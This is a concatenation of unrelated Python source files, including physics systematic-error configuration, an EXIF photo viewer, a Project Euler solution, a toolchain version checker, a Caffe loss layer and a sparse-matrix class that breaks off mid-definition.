#PC_EXCESS_VARIATIONS.remove("BirksDown")
#PC_EXCESS_VARIATIONS.remove("MichelEScaleUp")
#PC_EXCESS_VARIATIONS.remove("MichelEScaleDown")
#PC_EXCESS_VARIATIONS.remove("GENIE_EFNUCR-1Sigma")
#PC_EXCESS_VARIATIONS.remove("GENIE_EFNUCR+1Sigma")
# EXTERNAL_ERROR_BANDS = {
# "BirksConstant": ["BirksDown", "BirksUp",],
# "CrossTalk": [ "XtalkSmear", ],
# "EnergyScale": [ "EMEScaleUp", "EMEScaleDown", ],
# "MichelEScale": [ "MichelEScaleUp", "MichelEScaleDown",],
# "dEdXEScale": ["dEdXEScaleUp", "dEdXEScaleDown",],
# "EFNUCR": ["GENIE_EFNUCR-1Sigma", "GENIE_EFNUCR+1Sigma"],
# MYSTERY_ALT_EB_NAME: [MYSTERY_ALT_EB_NAME, ]
# }
# for err_name, err_group in BKND_UNIV_SYSTEMATICS.iteritems():
# # these are constraint err bands, not spectators
# if "flux" in err_name.lower():
# continue
# for err_name in err_group:
# ERROR_CONSTRAINT_STRATEGIES[err_name] = PlotUtils.MnvHistoConstrainer.PRESERVE_FRACTIONAL_ERR
# if USE_GENIE_INDIV_KNOBS:
# BKND_UNIV_SYSTEMATICS["GENIE"] += [
# "truth_genie_wgt_AGKYxF1pi",
# "truth_genie_wgt_AhtBY",
# "truth_genie_wgt_BhtBY",
# "truth_genie_wgt_CCQEPauliSupViaKF",
# "truth_genie_wgt_CV1uBY",
# "truth_genie_wgt_CV2uBY",
# "truth_genie_wgt_EtaNCEL",
# "truth_genie_wgt_FrAbs_N",
# "truth_genie_wgt_FrAbs_pi",
# "truth_genie_wgt_FrCEx_N",
# "truth_genie_wgt_FrCEx_pi",
# "truth_genie_wgt_FrElas_N",
# "truth_genie_wgt_FrElas_pi",
# "truth_genie_wgt_FrInel_N",
# "truth_genie_wgt_FrInel_pi",
# "truth_genie_wgt_FrPiProd_N",
# "truth_genie_wgt_FrPiProd_pi",
# "truth_genie_wgt_MFP_N",
# "truth_genie_wgt_MFP_pi",
# "truth_genie_wgt_MaCCQE",
# "truth_genie_wgt_MaNCEL",
# "truth_genie_wgt_MaRES",
# "truth_genie_wgt_MvRES",
# "truth_genie_wgt_NormDISCC",
# "truth_genie_wgt_RDecBR1gamma",
# "truth_genie_wgt_Rvn1pi",
# "truth_genie_wgt_Rvn2pi",
# "truth_genie_wgt_Rvp1pi",
# "truth_genie_wgt_Rvp2pi",
# "truth_genie_wgt_Theta_Delta2Npi",
# "truth_genie_wgt_VecFFCCQEshape",
# ]
# GENIE_ERROR_GROUPS = {
# #"Elastic": ["NormCCQE", "MaCCQEshape", "MaCCQE", "VecFFCCQEshape", "CCQEPauliSupViaKF", "MaNCEL", "EtaNCEL"],
# #"Resonance": ["NormCCRES", "MaRES", "MvRES", "NormNCRES", "RDecBR1gamma", "Theta_Delta2Npi"],
# #"DIS": ["NormDISCC", "Rvp1pi", "Rvn1pi", "Rvp2pi", "Rvn2pi", "AGKYxF1pi", "AhtBY", "BhtBY", "CV1uBY", "CV2uBY",],
# "Primary interaction" :[
# # Elastic
# "NormCCQE", "MaCCQEshape", "MaCCQE", "VecFFCCQEshape", "CCQEPauliSupViaKF", "MaNCEL", "EtaNCEL",
# # Resonance
# "NormCCRES", "MaRES", "MvRES", "NormNCRES", "RDecBR1gamma", "Theta_Delta2Npi",
# # DIS
# "NormDISCC", "Rvp1pi", "Rvn1pi", "Rvp2pi", "Rvn2pi", "AGKYxF1pi", "AhtBY", "BhtBY", "CV1uBY", "CV2uBY",
# ],
# "FSI model": ["FrAbs_N", "FrAbs_pi", "FrCEx_N", "FrCEx_pi", "FrElas_N", "FrElas_pi", "FrInel_N", "FrInel_pi", "FrPiProd_N", "FrPiProd_pi", "MFP_N", "MFP_pi",],
# #"efnucr_flat", "EFNUCR"],
# }
# OTHER_INTERACTION_ERROR_GROUPS = {
# "Sideband model": ["BackgroundFit", "SidebandModel" ],
# "Coherent": ["CoherentModel",],
# "Excess process model": ["MysteryProcessModel",],
# }
# DETECTOR_RESPONSE_ERROR_GROUPS = {
# "Angular resolution": ["ElectronAngle", "theta_bias", "theta_smear"],
# "EM energy scale": ["EnergyScale", "dEdXEScale"],
# "Birks's constant": ["BirksConstant", "birks_constant_flat"],
# "Cross-talk": ["CrossTalk", "xtalk_alt"],
# "Global energy scale": ["meu",],
# "Hadron response": ["pion_response", "proton_response", "other_response", "neutron_pathlength"],
# "Michel electron energy scale": ["MichelEScale",],
# "MINOS": ["minos_overlap",],
# "Muon energy scale": ["muon_energy_scale", ],
# "Target mass": ["Mass", "target_mass"],
# "Timing": ["WideTimeWindow",],
# "Reconstruction": ["no_isoblobs_cut", "rock_subtraction", "tracking_efficiency", "unfolding", "vertex_smear"],
# }
################################# Error summary plot config ############################
# Error-band grouping for the error-summary plots: detector response.
DETECTOR_RESPONSE_ERROR_GROUPS = {
    "Angular resolution": ["eltheta",],
    "Beam Angle": ["beam_angle",],
    "EM energy scale": ["elE_ECAL","elE_HCAL"],
    "Birk's Constant" : ["birks"],
    "Particle Response":["response_"+i for i in RESPONSE_BRANCHES]
}
# MINERvA tune (RPA / 2p2h) error bands.
MINERVA_TUNNING_ERROR_GROUPS = {
    "RPA" : ["RPA_"+i for i in RPA_UNIVERSES],
    "Low Recoil 2p2h Tune" : ["Low_Recoil_2p2h_Tune"],
    #"Low Q2 Pion": ["LowQ2Pi"],
}
# GENIE interaction-model knobs: everything except the FSI ("Fr*") knobs.
# MaCCQE/Rvn1pi/Rvp1pi are produced by dedicated classes but still grouped here.
GENIE_ERROR_GROUPS = {
    "GENIE" : ["GENIE_"+ i for i in (GENIE_UNIVERSES+["MaCCQE", "Rvn1pi", "Rvp1pi"] ) if not i.startswith("Fr") ]
}
# GENIE final-state-interaction knobs (the "Fr*" knobs).
FSI_ERROR_GROUPS = {
    "GENIE-FSI" : ["GENIE_"+ i for i in GENIE_UNIVERSES if i.startswith("Fr") ]
}
GEANT_ERROR_GROUPS = {
    "GEANT" : ["GEANT_" +i for i in ("Neutron","Pion","Proton")]
}
# Top-level grouping used for the consolidated error-summary plot.
CONSOLIDATED_ERROR_GROUPS_CONFIG = {
    "Detector model": [DETECTOR_RESPONSE_ERROR_GROUPS,GEANT_ERROR_GROUPS],
    "Interaction model": [GENIE_ERROR_GROUPS],
    "FSI": [FSI_ERROR_GROUPS],
    "MnvTunes" :[MINERVA_TUNNING_ERROR_GROUPS],
}
# Flatten the config above into {top-level group name: [error band names]}.
CONSOLIDATED_ERROR_GROUPS = {
    key:[e for group in CONSOLIDATED_ERROR_GROUPS_CONFIG[key] for e in itertools.chain.from_iterable(iter(group.values()))] for key in CONSOLIDATED_ERROR_GROUPS_CONFIG
}
# Finer-grained grouping: every sub-group is shown separately.
DETAILED_ERROR_GROUPS = DETECTOR_RESPONSE_ERROR_GROUPS.copy()
DETAILED_ERROR_GROUPS.update(GENIE_ERROR_GROUPS)
DETAILED_ERROR_GROUPS.update(GEANT_ERROR_GROUPS)
DETAILED_ERROR_GROUPS.update(MINERVA_TUNNING_ERROR_GROUPS)
# ERROR_SUBGROUPS = {
# "Detector model": DETECTOR_RESPONSE_ERROR_GROUPS,
# "Flux model": FLUX_ERROR_GROUPS,
# "Interaction model": dict(GENIE_ERROR_GROUPS.items() + OTHER_INTERACTION_ERROR_GROUPS.items()),
# }
# systematics from universes generated from external calculations
# (e.g., dedicated variation samples).
# these should be in the form of histogram(s) in the same binning
# as the CV histogram, stored in a file somewhere
# EXTERNAL_UNIV_CONFIG = {
# "BkndShape": {
# "err_band_type": PlotUtils.MnvVertErrorBand,
# "histo_file": os.path.join( AnalysisConfig.PlotPath("BackgroundFitting"), AnalysisConfig.bknd_constraint_method, "background_prediction_histos.root" ),
# "histo_names": ["mc_bknd_pred",]
# },
# }
# DEFAULT_VERT_SYSTEMATICS = BKND_UNIV_SYSTEMATICS.copy()
# ########################
# def GroupErrors(plotter, grouping=CONSOLIDATED_ERROR_GROUPS):
# Vector_string_type = getattr(ROOT, "vector<string>")
# # so.......... I can't seem to get genreflex
# # to create the proper dictionaries to allow me
# # to interrogate the error_summary_group_map for its list of keys.
# # thus I will store them separately.
# if not hasattr(plotter, "error_group_list"):
# plotter.error_group_list = []
# # for prefix, grouping in zip( ("truth_genie_wgt", "mc_wgt_Flux"), (GENIE_ERROR_GROUPS, FLUX_ERROR_GROUP) ):
# for group_name, error_list in grouping.iteritems():
# vector = Vector_string_type()
# for error_name in error_list:
# vector.push_back(error_name)
# plotter.error_summary_group_map[group_name] = vector
# plotter.error_group_list.append(group_name)
# # make an MnvPlotter that has the right error groups
# plotter = PlotUtils.MnvPlotter()
# GroupErrors(plotter)
# plotter.text_size = 0.03
# #plotter.legend_n_columns = 2
# plotter.legend_offset_x = 0.02
# plotter.legend_text_size = 0.03
# plotter.height_nspaces_per_hist = 1
# plotter.width_xspace_per_letter = 0.3
# plotter.legend_offset_y = -0.1
# # also make an MnvHistoConstrainer with the right error strategies
# constrainer = PlotUtils.MnvHistoConstrainer()
# constrainer.LoadConstraint("nu+e", os.path.expandvars("$MPARAMFILESROOT/data/FluxConstraints/nu+e.txt"))
# for err_name, strategy in ERROR_CONSTRAINT_STRATEGIES.iteritems():
# constrainer.SetSpectatorCorrectionStrategy(err_name, strategy)
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2017 Judit Acs <judit@sch.bme.hu>
#
# Distributed under terms of the MIT license.
from argparse import ArgumentParser
from sys import stdin
from morph_seg.sequence_tagger.inference import Inference
class MLPInference(Inference):
    """Inference wrapper that prints morphological segmentations to stdout.

    Labels in ``self.decoded`` are aligned to the tail of each sample; '_'
    inserts a space boundary and 'M' inserts a literal "\\\\" marker before
    the corresponding character.
    """

    def print_segmentation(self):
        """Print one segmented sample per line."""
        for idx, sample in enumerate(self.dataset.samples):
            labels = self.decoded[idx]
            # The decoded sequence can be longer than the sample; align to its tail.
            skip = len(labels) - len(sample)
            pieces = []
            for pos, ch in enumerate(sample):
                label = labels[pos + skip]
                if label == '_':
                    pieces.append(' ')
                elif label == 'M':
                    pieces.append("\\\\")
                pieces.append(ch)
            print(''.join(pieces).strip())
def parse_args():
    """Parse the command-line options for the segmentation inference script."""
    parser = ArgumentParser()
    parser.add_argument('--model-dir', type=str, required=True,
                        help="Location of model and parameter files")
    return parser.parse_args()
def main():
    """Run segmentation inference on words read from stdin and print the results."""
    args = parse_args()
    # The input to segment is streamed from standard input.
    inf = MLPInference(args.model_dir, stdin)
    inf.run_inference()
    inf.print_segmentation()


if __name__ == '__main__':
    main()
|
import sys
import os
import kivy
from kivy.app import App
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.widget import Widget
from kivy.uix.button import Button
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.graphics import Rectangle, Color
from kivy.properties import ObjectProperty
from kivy.core.window import Window
from exifData import Exifdata
from config import Config
from photoList import PhotoList
from util import transposeImage
class MainWidget(BoxLayout):
    """ The main/root widget for the ExifPhotos. The UI is defined in .kv file """

    def __init__(self, config):
        """Read display/tag settings from *config* and load the starting folder."""
        super(MainWidget, self).__init__()
        self.config = config
        # load tag mappings defined in config
        self.exifdata = Exifdata()
        mappingFileList = config.getOrAdd('TagMappingFiles', 'StdTagMapping.txt').split(',')
        for item in mappingFileList:
            self.exifdata.addMapping(item.strip())
        # load display tags (the EXIF keys shown in the grid)
        self.displayTags = []
        tags = config.getOrAdd('DisplayTags', 'Image Width, Image Height, Date Taken').split(',')
        for item in tags:
            self.displayTags.append(item.strip())
        # get display config
        self.overrideGridFontSize = config.getOrAddBool('OverrideGridFontSize', False)
        if self.overrideGridFontSize:
            self.gridFontSize = config.getOrAddInt('GridFontSize', 36)
        self.showFullFilePath = config.getOrAddBool('ShowFullFilePath', True)
        # create PhotoList with starting folder
        self.defaultFolder = config.getOrAdd('DefaultFolder', '')
        self.includeSubfolder = config.getOrAddBool('IncludeSubfolder', False)
        self.photos = PhotoList()
        self.openFolder(self.defaultFolder)

    def openDialog(self):
        """ popup dialog to select folder """
        content = FolderPickerDialog(self)
        content.ids.filechooser.path=self.photos.folder
        # Size the popup to match the window orientation (landscape vs portrait).
        if Window.width > Window.height:
            sizehint=(0.6, 0.8)
        else:
            sizehint=(0.8, 0.6)
        self._popup = Popup(title="Folder Picker", content=content, auto_dismiss=False, size_hint=sizehint)
        self._popup.open()
        pass

    def dismissDialog(self):
        """ dismiss the pop up dialog """
        self._popup.dismiss()

    def openFolder(self, folder):
        """ populate all files from the folder and display the first file """
        self.photos.openFolder(folder, self.includeSubfolder)
        self.displayFile(self.photos.currentPhoto())

    def displayFile(self, filePath):
        """ display file's name, image, and exif data """
        if filePath is not None:
            self.displayExifGrid(filePath)
            if self.showFullFilePath:
                self.ids.ImageLabel.text = filePath
            else:
                self.ids.ImageLabel.text = os.path.basename(filePath)
            # The index widgets are optional in the .kv layout.
            if 'PhotoIndex' in self.ids:
                self.ids.PhotoIndex.text = '%i' %(self.photos.index+1)
                self.ids.PhotoCountLabel.text = '%i' %(len(self.photos.photos))
            # if orientation is not normal then transpose the image in a temporary file
            srcPath = transposeImage(filePath, self.exifdata)
            self.ids.PhotoImage.source = srcPath
            if not srcPath == filePath:
                # reload from the temp file since it's the same file and will be cached by Image
                self.ids.PhotoImage.reload()

    def nextPhoto(self):
        """ move to next photo if available """
        self.displayFile(self.photos.next())

    def prevPhoto(self):
        """ move to prev photo if available """
        self.displayFile(self.photos.prev())

    def goto(self, number):
        """ move to specified number (index + 1). move to the last photo if number is < 1 or > max """
        self.displayFile(self.photos.goto(int(number)-1))

    def displayExifGrid(self, filePath):
        """ display exif data """
        self.exifdata.getExifdata(filePath)
        grid = self.ids.exifGrid
        grid.clear_widgets()
        # Show only the configured tags that are actually present in this file.
        for key in self.displayTags:
            if self.exifdata.hasKey(key):
                self.displayTag(key, self.exifdata.getValue(key))

    def displayTag(self, name, value):
        """ append one name/value row to the EXIF grid """
        grid = self.ids.exifGrid
        keylabel = Label(text=str(name))
        grid.add_widget(keylabel)
        vallabel = Label(text=str(value))
        grid.add_widget(vallabel)
        if self.overrideGridFontSize:
            keylabel.font_size = self.gridFontSize
            vallabel.font_size = self.gridFontSize

    #def on_touch_down(self, touch):
    #    print(touch)
class FolderPickerDialog(FloatLayout):
    """Content widget for the folder-picker popup (layout defined in the .kv file)."""

    def __init__(self, mainWidget):
        super(FolderPickerDialog,self).__init__()
        # Back-reference so the dialog's buttons can dismiss the popup / open folders.
        self.mainWidget = mainWidget

    def cancel(self):
        """Close the popup without changing the folder."""
        self.mainWidget.dismissDialog()

    def open(self, path):
        """Close the popup and load the chosen folder."""
        self.mainWidget.dismissDialog()
        self.mainWidget.openFolder(path)
# Kivy App
class exifMainApp(App):
    """Kivy application wrapper; builds a MainWidget root from the given config."""

    def __init__(self, config):
        super(exifMainApp,self).__init__()
        # NOTE(review): stored under a distinct name, presumably to avoid
        # clashing with kivy App's own 'config' attribute -- confirm.
        self.exifConfig = config

    def build(self):
        # return a MainWidget() as a root widget
        self.mainWidget = MainWidget(self.exifConfig)
        return self.mainWidget
if __name__ == '__main__':
    # Optional first command-line argument: path to the configuration file.
    configFile='exifMainConfig.txt'
    if len(sys.argv) > 1:
        configFile = sys.argv[1]
    # apply config settings
    config = Config(configFile, autoSave = False)
    if config.getOrAddBool('Window.fullscreen', False):
        Window.fullscreen = True
    else:
        # Windowed mode: restore size and position from config.
        Window.size = (config.getOrAddInt('Window.width', 1600), config.getOrAddInt('Window.height', 1000))
        Window.top = config.getOrAddInt('Window.top', 40)
        Window.left = config.getOrAddInt('Window.left', 100)
    app = exifMainApp(config)
    app.run()
|
# Question: https://projecteuler.net/problem=190
"""
We have x1, x2, ..., xm > 0.
So, utilizing the AM-GM inequality,
x1 * (x2)^2 * (x3)^3 * ... * (xm)^m
= x1 * [(1/2)(x2)]^2 * [(1/3)(x3)]^3 * ... * [(1/m)(xm)^m] * product{i=1..m}(i^i)
(AM-GM) <= (m / (m(m+1)/2))^(m(m+1)/2) * product{i=1..m}(i^i)
= (2/(m+1))^(m(m+1)/2) * product{i=1..m}(i^i)
'=' occurs when x1 = (1/2)*x2 = (1/3)*x3 = ... = (1/m)*xm
In other words, x2 = 2*x1, x3 = 3*x1, ..., xm = m*x1.
"""
from fractions import Fraction


def solve(n=15):
    """Return sum_{m=2..n} floor(P_m) for Project Euler 190.

    P_m = (2/(m+1))^(m(m+1)/2) * product_{i=1..m} i^i is the maximum of
    x1 * x2^2 * ... * xm^m subject to x1 + ... + xm = m (see derivation above).

    :param n: largest m to include (the original task uses n = 15)
    """
    total = 0
    product_i_i = 1  # running product of i^i for i = 2..m (the i = 1 factor is 1)
    for m in range(2, n + 1):
        product_i_i = product_i_i * (m ** m)
        # Exact rational arithmetic: floating-point powers can round the wrong
        # way when P_m lies close to an integer boundary.
        p_m = product_i_i * Fraction(2, m + 1) ** (m * (m + 1) // 2)
        # int() truncates toward zero, which equals floor for these positive values.
        total = total + int(p_m)
    return total


if __name__ == '__main__':
    print(solve())
|
from __future__ import print_function, unicode_literals, absolute_import
import glob, sys
# Pick a console implementation matching the current platform. The previous
# version used the Python-2-only "except ImportError, x:" syntax (a
# SyntaxError on Python 3) and, in the fallback branch, swallowed the
# ImportError and then executed a bare `raise` unconditionally -- so even a
# successful import raised RuntimeError. Both are fixed below.
success = False
in_ironpython = "IronPython" in sys.version

if in_ironpython:
    # IronPython needs its own console implementation.
    try:
        from .ironpython_console import *
        success = True
    except ImportError:
        raise
elif sys.platform.startswith('linux') or sys.platform == 'darwin':
    # POSIX terminals speak ANSI escape sequences.
    try:
        from .ansi_console import *
        success = True
    except ImportError:
        raise
else:
    # Default (Windows) console implementation.
    try:
        from .console import *
        success = True
    except ImportError:
        raise

if not success:
    raise ImportError(
        "Could not find a console implementation for your platform")
|
"""Rendering setup"""
from os.path import abspath
from injectool import add_singleton, add_resolver, SingletonResolver
from pyviews.rendering.pipeline import RenderingPipeline
def use_rendering():
    """setup rendering dependencies"""
    # Views are loaded from the 'views' directory, resolved against the CWD.
    add_singleton('views_folder', abspath('views'))
    # View files carry the .xml extension.
    add_singleton('view_ext', 'xml')
    # RenderingPipeline dependencies are resolved through a singleton resolver.
    add_resolver(RenderingPipeline, SingletonResolver())
|
from abc import ABC, abstractmethod
from datetime import datetime
import ipywidgets as widgets
import plotly.graph_objs as go
class DashPlot(ABC):
    """Abstract base class for a dashboard plot wrapping a plotly FigureWidget.

    Subclasses populate ``widget``, ``dataFunction`` and ``name`` in their
    constructor and implement :meth:`plot` to refresh the widget with data.
    """

    @abstractmethod
    def __init__(self):
        super().__init__()
        # The plotly widget rendered in the dashboard.
        self.widget = go.FigureWidget()
        # Callable fetching fresh data on each plot() call; set by subclasses.
        self.dataFunction = None
        # Human-readable plot name; set by subclasses.
        self.name = None

    @abstractmethod
    def plot(self):
        """Refresh ``self.widget`` with fresh data (subclass responsibility)."""
        raise NotImplementedError
class JobStatusesDashPlot(DashPlot):
    """Pie chart of Melissa job statuses."""

    def __init__(self, melissaMonitoring):
        super().__init__()
        self.name = 'Job statuses'
        self.dataFunction = melissaMonitoring.getJobStatusData
        self.widget.add_pie()
        # Show label and percentage on slices; add the raw value on hover.
        self.widget.data[0].textinfo = 'label+percent'
        self.widget.data[0].hoverinfo = 'label+percent+value'
        self.widget.layout.title.text = 'Jobs statuses'

    def plot(self):
        """Refresh the pie chart from the latest status data."""
        # dataFunction returns a mapping; keys become labels, values slice sizes.
        self.data = self.dataFunction()
        self.widget.data[0].labels = list(self.data.keys())
        self.widget.data[0].values = list(self.data.values())
class CoreUsageDashPlot(DashPlot):
    """Time series of the total number of CPU cores used by the current jobs."""

    def __init__(self, melissaMonitoring):
        super().__init__()
        self.name = 'Cores usage'
        # Called with the current job IDs on every refresh (see plot()).
        self.dataFunction = melissaMonitoring.spawner.getTotalCPUCount
        self.data = []  # sampled core counts
        self.time = []  # timestamps of the samples
        self.melissaMonitoring = melissaMonitoring
        self.widget.add_scatter(name="Cores used")
        self.widget.layout.autosize = True
        self.widget.layout.showlegend = True
        self.widget.layout.xaxis.rangeslider.visible = True
        self.widget.layout.title.text = 'Core usage'
        self.widget.layout.xaxis.title.text = 'Time elapsed'
        self.widget.layout.yaxis.title.text = '# of cores'
        self.widget.layout.xaxis.tick0 = 0
        self.widget.layout.yaxis.tick0 = 0
        self.widget.layout.hovermode = 'x'

    def plot(self):
        """Append the current core count and redraw the series."""
        self.data.append(self.dataFunction(self.melissaMonitoring.getJobsIDs()))
        self.time.append(datetime.now())
        self.widget.data[0].x = self.time
        self.widget.data[0].y = self.data
class SobolConfidenceIntervalDashPlot(DashPlot):
    """Time series of the Sobol confidence interval."""

    def __init__(self, melissaMonitoring):
        super().__init__()
        self.name = 'Sobol confidence interval'
        self.dataFunction = melissaMonitoring.getSobolConfidenceInterval
        self.data = {}
        self.widget.add_scatter(name="Confidence interval")
        layout = self.widget.layout
        layout.autosize = True
        layout.showlegend = True
        layout.xaxis.rangeslider.visible = True
        layout.title.text = 'Sobol confidence interval'
        layout.xaxis.title.text = 'Time elapsed'
        layout.yaxis.title.text = 'Confidence value'
        layout.xaxis.tick0 = 0
        layout.yaxis.tick0 = 1
        layout.hovermode = 'x'

    def plot(self):
        interval = self.dataFunction()
        if interval is not None:
            # Samples keyed by wall-clock time; None means no interval yet.
            self.data[datetime.now()] = interval
            trace = self.widget.data[0]
            trace.x = list(self.data.keys())
            trace.y = list(self.data.values())
|
#!/usr/bin/env python
import argparse
import sys
from secureboot import which
"""
This function will print input message and exit.
"""
def Exit(inMsg):
    """Print ``inMsg`` and terminate the process with exit status 1."""
    # print() with a single argument behaves identically on Python 2
    # (parenthesized expression) and Python 3; the original bare
    # `print inMsg` statement is a SyntaxError under Python 3.
    print(inMsg)
    sys.exit(1)
"""
This function will populate toolchain version.
"""
def GettoolchainVersion(inVersionCommand):
    """Run ``inVersionCommand`` and return its stdout with trailing whitespace stripped."""
    import subprocess
    proc = subprocess.Popen(inVersionCommand.split(), stdout=subprocess.PIPE)
    out = proc.communicate()[0]
    return out.rstrip()
"""
This function will return absolute path of toolchain.
If the path comes out to be empty then exit with error.
"""
def customWhich(command):
    """Resolve ``command`` to an absolute path via which().

    Exits with an error message when which() reports an empty path.
    """
    resolved = which(command)
    if resolved == "":
        Exit("Command: " + command + " does not exist")
    return resolved
"""
This function will check
lto_state and ARM_GCC toolchain version
______________________
lto_state | required |
| version |
----------------------
n/<empty> | >= 4.9.3 |
----------------------
y | 4.9.3 |
----------------------
"""
def ARM_GCCCheck(inOpts):
    """Validate the arm-none-eabi-gcc version against the lto_state rule.

    lto_state "n" or "" requires gcc >= 4.9.3; lto_state "y" requires
    exactly 4.9.3.  Exits via Exit() on a version mismatch.
    """
    toolchain = "arm-none-eabi-gcc"
    lto_state = inOpts.lto_state[0]
    versionCommand = " ".join([customWhich(toolchain), "-dumpversion"])
    # Compare component-by-component.  The original stripped the dots and
    # compared strings, which mis-orders versions as soon as a component
    # has a different digit count (e.g. "4.10.1" -> "4101" < "493").
    raw_version = GettoolchainVersion(versionCommand)
    if isinstance(raw_version, bytes):  # Popen yields bytes on Python 3
        raw_version = raw_version.decode()
    version = tuple(int(part) for part in raw_version.split("."))
    required = (4, 9, 3)
    if lto_state in ("n", "") and version < required:
        # Note: no longer shadows the builtin `str` for the message parts.
        Exit(" ".join(["Please use 4.9.3 or higher version", toolchain]))
    elif lto_state == "y" and version != required:
        Exit(" ".join(["Please use 4.9.3 only version", toolchain]))
def VersionCheck(inOpts):
    """Dispatch the toolchain-specific version check."""
    selected = inOpts.toolchain[0]
    if selected == "arm_gcc":
        ARM_GCCCheck(inOpts)
    elif selected != "iar":
        # Only arm_gcc and iar are recognized.
        Exit("Incorrect toolchain selected")
def ArchNameCheck(inOpts):
    """Ensure arch_name is one of the supported architectures."""
    supported = ['mc200', 'mw300']
    if inOpts.arch_name[0] not in supported:
        Exit("Incorrect arch_name selected")
def ValueCheck(inValue, inValueName):
    """Exit with a hint when a required option was not supplied."""
    if inValue is not None:
        return
    Exit("Please specify " + inValueName)
def OptsCheck(inOpts):
    """Verify that all mandatory options were provided."""
    for attr in ("toolchain", "lto_state", "arch_name"):
        ValueCheck(getattr(inOpts, attr), attr)
def main():
    """Parse the command line and run all toolchain checks."""
    parser = argparse.ArgumentParser(description='This will check toolchain version')
    parser.add_argument("-V", "--version",
                        action="version",
                        version="%(prog)s v1.0")
    checker = parser.add_argument_group()
    # The three checker options share the same shape; build them in a loop.
    for flag, name in (("-t", "toolchain"),
                       ("-l", "lto_state"),
                       ("-a", "arch_name")):
        checker.add_argument(flag, "--" + name,
                             action="store",
                             nargs=1,
                             dest=name,
                             help="Specify " + name)
    opts, unknown = parser.parse_known_args()
    if len(sys.argv) == 1:
        # No arguments at all: show usage and bail out.
        parser.print_help()
        parser.exit(1)
    OptsCheck(opts)
    ArchNameCheck(opts)
    VersionCheck(opts)


if __name__ == '__main__':
    main()
|
from . import Plugin
from jinja2 import Template
class ConsolePrint(Plugin):
    """Plugin that renders a configured Jinja2 template and prints it."""

    def __init__(self, *, config):
        template_source = config.get("content", "")
        self.content_tmpl = Template(template_source)

    def execute(self, vote):
        # Expose every attribute of the vote object to the template.
        print(self.content_tmpl.render(vote.__dict__))
import caffe
import numpy as np
import pdb
class MyLossLayer(caffe.Layer):
    """Layer of Efficient Siamese loss function."""
    def setup(self, bottom, top):
        # Hinge margin of the pairwise ranking loss.
        self.margin = 10
        print '*********************** SETTING UP'
        pass
    def forward(self, bottom, top):
        """The parameters here have the same meaning as data_layer"""
        # Assumed batch layout (from the loop bounds — TODO confirm against
        # the data layer): `dis` groups of SepSize = batch*level samples;
        # within each group every pair (i, j) with j in a strictly later
        # batch than i is compared.
        self.Num = 0
        batch = 1
        level = 5
        dis = 9
        SepSize = batch*level
        self.dis = []
        # for the first
        for k in range(dis):
            for i in range(SepSize*k,SepSize*(k+1)-batch):
                for j in range(SepSize*k + int((i-SepSize*k)/batch+1)*batch,SepSize*(k+1)):
                    # Score difference for the ordered pair (i ranked above j).
                    self.dis.append(bottom[0].data[i]-bottom[0].data[j])
                    self.Num +=1
        self.dis = np.asarray(self.dis)
        self.loss = np.maximum(0,self.margin-self.dis) # Efficient Siamese forward pass of hinge loss
        top[0].data[...] = np.sum(self.loss)/bottom[0].num
    def backward(self, top, propagate_down, bottom):
        """The parameters here have the same meaning as data_layer"""
        # Accumulate +/-1 (sub)gradients per sample for every pair whose
        # hinge is active; enumerates pairs in the SAME order as forward so
        # that `index` lines up with self.loss.
        batch=1
        index = 0
        level = 5
        dis = 9
        SepSize = batch*level
        self.ref= np.zeros(bottom[0].num,dtype=np.float32)
        for k in range(dis):
            for i in range(SepSize*k,SepSize*(k+1)-batch):
                for j in range(SepSize*k + int((i-SepSize*k)/batch+1)*batch,SepSize*(k+1)):
                    if self.loss[index]>0:
                        self.ref[i] += -1
                        self.ref[j] += +1
                    index +=1
        # Efficient Siamese backward pass
        bottom[0].diff[...]= np.reshape(self.ref,(bottom[0].num,1))/bottom[0].num
    def reshape(self, bottom, top):
        """Reshaping happens during the call to forward."""
        top[0].reshape(1)
|
"""Application Models."""
from marshmallow import fields, Schema
from marshmallow.validate import OneOf
from ..enums import *
from ..models.BaseSchema import BaseSchema
from .StaffCheckout import StaffCheckout
from .Files import Files
class CartPosCheckoutDetailRequest(BaseSchema):
    """Marshmallow schema for a POS cart checkout request payload.

    All fields are optional; field set mirrors the PosCart swagger.json
    definition (see comment below).
    """
    # PosCart swagger.json
    callback_url = fields.Str(required=False)
    payment_identifier = fields.Str(required=False)
    meta = fields.Dict(required=False)
    ordering_store = fields.Int(required=False)
    payment_mode = fields.Str(required=False)
    pick_at_store_uid = fields.Int(required=False)
    staff = fields.Nested(StaffCheckout, required=False)
    extra_meta = fields.Dict(required=False)
    payment_params = fields.Dict(required=False)
    merchant_code = fields.Str(required=False)
    pos = fields.Boolean(required=False)
    aggregator = fields.Str(required=False)
    fyndstore_emp_id = fields.Str(required=False)
    delivery_address = fields.Dict(required=False)
    files = fields.List(fields.Nested(Files, required=False), required=False)
    billing_address = fields.Dict(required=False)
    address_id = fields.Str(required=False)
    payment_auto_confirm = fields.Boolean(required=False)
    order_type = fields.Str(required=False)
    billing_address_id = fields.Str(required=False)
|
import numpy as np
import scipy.sparse
from scipy.sparse import spmatrix, coo_matrix, sputils
from .base import _formats
from .cic import cic_matrix
from .cir import cir_matrix
from .vsb import vsb_matrix
from .util import nbytes
class cvb_matrix(spmatrix):
    """
    Circulant Vertical Block matrix
    Stores the first block as a sparse matrix.
    """
    format = 'cvb'
    def __init__(self, arg1, shape, dtype=None):
        # arg1 = (block, shift): block-row i of the full matrix is `block`
        # with its columns rotated by i*shift (see get_block below).
        super().__init__()
        self._shape = shape
        self.block, self.shift = arg1
        # if not (isinstance(self.block, (cic_matrix, cir_matrix))):
        #     raise NotImplementedError("TODO")
        assert self.block.shape[1] == shape[1]
        # The full height must be a whole number of block rows.
        assert shape[0]%self.block.shape[0] == 0
        self.n_blocks = self.shape[0]//self.block.shape[0]
        self.dtype = self.block.dtype
    # TODO: slicing
    def __repr__(self):
        format = _formats[self.getformat()][1]
        return (
            f"<{self.shape[0]}x{self.shape[1]} sparse matrix of type"
            f" '{self.dtype.type}'\n\twith {self.nnz} stored elements in {format}"
            " format>"
        )
    def getnnz(self):
        # NOTE(review): counts only the stored (first) block, while
        # count_nonzero() multiplies by n_blocks — confirm the asymmetry
        # is intended (stored elements vs logical non-zeros).
        return self.block.getnnz()
    def count_nonzero(self):
